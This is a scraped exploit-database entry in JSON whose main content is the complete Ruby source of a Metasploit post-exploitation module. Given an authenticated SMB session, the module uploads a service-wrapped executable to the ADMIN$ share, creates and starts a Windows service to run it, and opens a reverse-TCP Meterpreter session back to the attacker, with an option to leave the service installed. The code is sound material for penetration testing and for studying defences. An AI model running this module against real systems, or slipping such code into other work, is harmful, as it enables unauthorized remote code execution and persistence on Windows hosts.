{“lastseen”:”2026-06-25T19:36:56″,”description”:”Upgrades an authenticated SMB session to a Meterpreter session using PsExec techniques. This module uploads a service-wrapped executable payload to the ADMIN$ share via the existing authenticated SMB connection, then creates and starts a Windows…”,”published”:”2026-06-25T19:05:15″,”modified”:”2026-06-25T19:05:15″,”type”:”metasploit”,”title”:”SMB to Meterpreter Upgrade via PsExec”,”source”:””,”references”:””,”id”:”MSF:POST-WINDOWS-MANAGE-SMB_TO_METERPRETER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Post\\n include Msf::Exploit::EXE\\n include Msf::Auxiliary::Report\\n include Msf::Post::SessionUpgrade\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘SMB to Meterpreter Upgrade via PsExec’,\\n ‘Description’ =\\u003e %q{\\n Upgrades an authenticated SMB session to a Meterpreter session using PsExec techniques.\\n This module uploads a service-wrapped executable payload to the ADMIN$ share via the\\n existing authenticated SMB connection, then creates and starts a Windows service that\\n executes the payload. This mirrors the approach used by exploit\/windows\/smb\/psexec.\\n Requires administrative privileges on the target.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [‘Dean Welch’],\\n ‘Platform’ =\\u003e [‘win’],\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘SessionTypes’ =\\u003e [‘smb’],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptEnum.new(‘TARGET_ARCH’, [true, ‘Target architecture.’, ‘x64’, [‘x86’, ‘x64’]])\\n ]\\n )\\n\\n register_advanced_options(\\n [\\n OptString.new(‘PAYLOAD_OVERRIDE’, [false, ‘Define the payload to use instead of the auto-selected meterpreter payload.’]),\\n OptString.new(‘SERVICE_NAME’, [false, ‘Custom service name (random if not set).’]),\\n OptString.new(‘SERVICE_DISPLAY_NAME’, [false, ‘Custom service display name.’]),\\n OptBool.new(‘SERVICE_PERSIST’, [false, ‘Do not delete the service after execution.’, false]),\\n OptString.new(‘SERVICE_FILENAME’, [false, ‘Filename for the uploaded payload (random if not set).’])\\n ]\\n )\\n end\\n\\n def run\\n return unless validate_session!\\n\\n datastore[‘PAYLOAD’] = datastore[‘PAYLOAD_OVERRIDE’].presence || select_payload\\n run_upgrade\\n end\\n\\n # Verifies the session can access ADMIN$ and bind to the SVCCTL pipe.\\n def check\\n return Exploit::CheckCode::Safe(‘Session is not valid’) unless validate_session!\\n\\n target_host = session.client.dispatcher.tcp_socket.peerhost\\n simple = session.simple_client\\n\\n # Verify ADMIN$ is writable\\n share = admin_share_path(target_host)\\n begin\\n simple.connect(share)\\n simple.disconnect(share)\\n rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error =\\u003e e\\n return Exploit::CheckCode::Safe(\\”Cannot access ADMIN$ share: #{e}\\”)\\n end\\n\\n # Verify SVCCTL pipe is accessible\\n begin\\n tree = session.client.tree_connect(\\”\\\\\\\\\\\\\\\\#{target_host}\\\\\\\\IPC$\\”)\\n svcctl = tree.open_file(filename: ‘svcctl’, write: true, read: true)\\n svcctl.bind(endpoint: RubySMB::Dcerpc::Svcctl)\\n scm_handle = svcctl.open_sc_manager_w(target_host)\\n svcctl.close_service_handle(scm_handle)\\n Exploit::CheckCode::Appears(‘ADMIN$ is writable and SVCCTL pipe is accessible’)\\n rescue RubySMB::Dcerpc::Error::SvcctlError =\\u003e e\\n if e.message.include?(‘ERROR_ACCESS_DENIED’)\\n Exploit::CheckCode::Safe(‘Insufficient privileges to open Service Control Manager’)\\n else\\n Exploit::CheckCode::Unknown(\\”SVCCTL error: #{e}\\”)\\n end\\n rescue RubySMB::Dcerpc::Error::BindError,\\n RubySMB::Dcerpc::Error::FaultError,\\n RubySMB::Dcerpc::Error::DcerpcError,\\n RubySMB::Error::RubySMBError =\\u003e e\\n Exploit::CheckCode::Unknown(\\”Cannot bind to SVCCTL pipe: #{e}\\”)\\n ensure\\n tree.disconnect! if tree\\n end\\n end\\n\\n # Uploads a service EXE to ADMIN$ and creates a Windows service to execute it.\\n def execute_upgrade(lhost)\\n target_host = session.client.dispatcher.tcp_socket.peerhost\\n simple = session.simple_client\\n @service_filename = datastore[‘SERVICE_FILENAME’] || \\”#{Rex::Text.rand_text_alpha(8)}.exe\\”\\n @target_host = target_host\\n @simple = simple\\n\\n upload_payload_exe(simple, target_host, lhost)\\n execute_service_via_svcctl(target_host)\\n end\\n\\n private\\n\\n # Generates the service-wrapped EXE and writes it to \\\\\\\\target\\\\ADMIN$\\\\\\u003cfilename\\u003e.\\n def upload_payload_exe(simple, target_host, lhost)\\n payload_data = generate_upgrade_payload(lhost, datastore[‘LPORT’], datastore[‘PAYLOAD’])\\n if payload_data.nil?\\n fail_with(Msf::Exploit::Failure::BadConfig, \\”Failed to generate payload #{datastore[‘PAYLOAD’]}\\”)\\n end\\n\\n arch = datastore[‘TARGET_ARCH’] == ‘x64’ ? [ARCH_X64] : [ARCH_X86]\\n opts = { code: payload_data, arch: arch, servicename: service_name }\\n exe = Msf::Util::EXE.to_executable_fmt(framework, arch.first, ‘win’, payload_data, ‘exe-service’, opts)\\n\\n if exe.nil? || exe.empty?\\n fail_with(Msf::Exploit::Failure::Unknown, ‘Failed to generate service EXE payload’)\\n end\\n\\n share = admin_share_path(target_host)\\n begin\\n simple.connect(share)\\n rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error =\\u003e e\\n fail_with(Msf::Exploit::Failure::Unreachable, \\”Failed to connect to ADMIN$ share: #{e}\\”)\\n end\\n\\n begin\\n fd = simple.open(\\”\\\\\\\\#{@service_filename}\\”, ‘rwct’, 48000, read: true, write: true)\\n fd \\u003c\\u003c exe\\n fd.close\\n print_status(\\”Uploaded payload to #{share}\\\\\\\\#{@service_filename}\\”)\\n rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error =\\u003e e\\n fail_with(Msf::Exploit::Failure::Unknown, \\”Failed to upload payload: #{e}\\”)\\n ensure\\n simple.disconnect(share)\\n end\\n end\\n\\n # Connects to IPC$ via SVCCTL, creates a service pointing at the uploaded EXE, and starts it.\\n def execute_service_via_svcctl(target_host)\\n svc_handle = nil\\n svcctl = nil\\n scm_handle = nil\\n\\n begin\\n tree = session.client.tree_connect(\\”\\\\\\\\\\\\\\\\#{target_host}\\\\\\\\IPC$\\”)\\n rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error =\\u003e e\\n print_error(\\”Failed to connect to IPC$ share: #{e}\\”)\\n return\\n end\\n\\n begin\\n svcctl = tree.open_file(filename: ‘svcctl’, write: true, read: true)\\n svcctl.bind(endpoint: RubySMB::Dcerpc::Svcctl)\\n vprint_status(‘Bound to \\\\\\\\svcctl’)\\n rescue RubySMB::Dcerpc::Error::BindError,\\n RubySMB::Dcerpc::Error::FaultError,\\n RubySMB::Dcerpc::Error::DcerpcError,\\n RubySMB::Error::RubySMBError =\\u003e e\\n print_error(\\”Failed to bind to SVCCTL pipe: #{e}\\”)\\n return\\n end\\n\\n begin\\n scm_handle = svcctl.open_sc_manager_w(target_host)\\n rescue RubySMB::Dcerpc::Error::SvcctlError =\\u003e e\\n if e.message.include?(‘ERROR_ACCESS_DENIED’)\\n print_error(‘Insufficient privileges to open Service Control Manager. Administrative access is required.’)\\n else\\n print_error(\\”Failed to open Service Control Manager: #{e}\\”)\\n end\\n return\\n end\\n\\n display_name = datastore[‘SERVICE_DISPLAY_NAME’] || Rex::Text.rand_text_alpha(rand(8..16))\\n # Service binary path points to the uploaded EXE in %SYSTEMROOT%\\n bin_path = \\”%SYSTEMROOT%\\\\\\\\#{@service_filename}\\”\\n\\n begin\\n vprint_status(\\”Creating service #{service_name}…\\”)\\n svc_handle = svcctl.create_service_w(scm_handle, service_name, display_name, bin_path)\\n rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Dcerpc::Error::FaultError =\\u003e e\\n print_error(\\”Failed to create service: #{e}\\”)\\n return\\n end\\n\\n begin\\n vprint_status(‘Starting the service…’)\\n svcctl.start_service_w(svc_handle)\\n print_good(‘Service started successfully’)\\n rescue RubySMB::Dcerpc::Error::SvcctlError =\\u003e e\\n # Timeout is expected \u2014 the service EXE spawns the payload then exits\\n if e.message.include?(‘ERROR_SERVICE_REQUEST_TIMEOUT’)\\n vprint_status(‘Service start timed out, expected for payload execution’)\\n else\\n print_error(\\”Failed to start service: #{e}\\”)\\n end\\n end\\n ensure\\n cleanup_service(svcctl, svc_handle, service_name) if svc_handle \\u0026\\u0026 svcctl\\n begin\\n svcctl\\u0026.close_service_handle(scm_handle) if scm_handle\\n rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError\\n vprint_warning(\\”Could not close scm handle: #{e}\\”)\\n end\\n cleanup_payload_file\\n end\\n\\n # Removes the uploaded EXE from ADMIN$ unless SERVICE_PERSIST is set.\\n def cleanup_payload_file\\n return if datastore[‘SERVICE_PERSIST’]\\n return if @service_filename.nil? || @simple.nil? || @target_host.nil?\\n\\n share = admin_share_path(@target_host)\\n begin\\n @simple.connect(share)\\n @simple.delete(\\”\\\\\\\\#{@service_filename}\\”)\\n vprint_good(\\”Deleted #{share}\\\\\\\\#{@service_filename}\\”)\\n rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error =\\u003e e\\n print_warning(\\”Could not delete #{@service_filename} from ADMIN$. Manual removal may be required: #{e}\\”)\\n ensure\\n begin\\n @simple.disconnect(share)\\n rescue RubySMB::Error::RubySMBError, Rex::Proto::SMB::Exceptions::Error\\n nil\\n end\\n end\\n end\\n\\n # Returns the service name, generating a random one if not configured.\\n def service_name\\n @service_name ||= datastore[‘SERVICE_NAME’].presence || Rex::Text.rand_text_alpha(rand(8..16))\\n end\\n\\n # Returns the UNC path to the ADMIN$ share on the target.\\n def admin_share_path(host)\\n \\”\\\\\\\\\\\\\\\\#{host}\\\\\\\\ADMIN$\\”\\n end\\n\\n # Selects the appropriate Meterpreter payload based on target architecture.\\n def select_payload\\n case datastore[‘TARGET_ARCH’]\\n when ‘x64’\\n ‘windows\/x64\/meterpreter\/reverse_tcp’\\n when ‘x86’\\n ‘windows\/meterpreter\/reverse_tcp’\\n end\\n end\\n\\n # Stops and deletes a Windows service created during execution.\\n def cleanup_service(svcctl, svc_handle, svc_name)\\n return if svcctl.nil? || svc_handle.nil?\\n\\n if datastore[‘SERVICE_PERSIST’]\\n vprint_status(\\”SERVICE_PERSIST is set, skipping service deletion for ‘#{svc_name}’\\”)\\n begin\\n svcctl.close_service_handle(svc_handle)\\n rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError =\\u003e e\\n vprint_warning(\\”Could not close service handle: #{e}\\”)\\n end\\n return\\n end\\n\\n begin\\n svcctl.control_service(svc_handle, RubySMB::Dcerpc::Svcctl::SERVICE_CONTROL_STOP)\\n rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError =\\u003e e\\n vprint_warning(\\”Could not stop service ‘#{svc_name}’: #{e}\\”)\\n end\\n\\n begin\\n svcctl.delete_service(svc_handle)\\n vprint_good(\\”Service ‘#{svc_name}’ deleted successfully\\”)\\n rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError =\\u003e e\\n print_warning(\\”Could not delete service ‘#{svc_name}’. Manual removal may be required: #{e}\\”)\\n end\\n\\n begin\\n svcctl.close_service_handle(svc_handle)\\n rescue RubySMB::Dcerpc::Error::SvcctlError, RubySMB::Error::RubySMBError =\\u003e e\\n vprint_warning(\\”Could not close service handle: #{e}\\”)\\n end\\n end\\n\\n # Returns true if session is valid, false otherwise.\\n def validate_session!\\n begin\\n session.client.dispatcher.tcp_socket.peerinfo\\n rescue Errno::ENOTCONN, IOError, Rex::ConnectionError =\\u003e e\\n print_error(\\”Session is not usable: #{e.message}\\”)\\n return false\\n end\\n\\n unless session.type == ‘smb’\\n print_error(\\”Invalid session type: #{session.type}. This module requires an SMB session.\\”)\\n return false\\n end\\n\\n true\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/post\/windows\/manage\/smb_to_meterpreter.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/post\/windows\/manage\/smb_to_meterpreter\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-25T19:36:56″,”description”:”Upgrades an authenticated SMB session to a Meterpreter session using PsExec techniques. This module uploads a service-wrapped executable payload to the ADMIN$ share via the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-65929","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n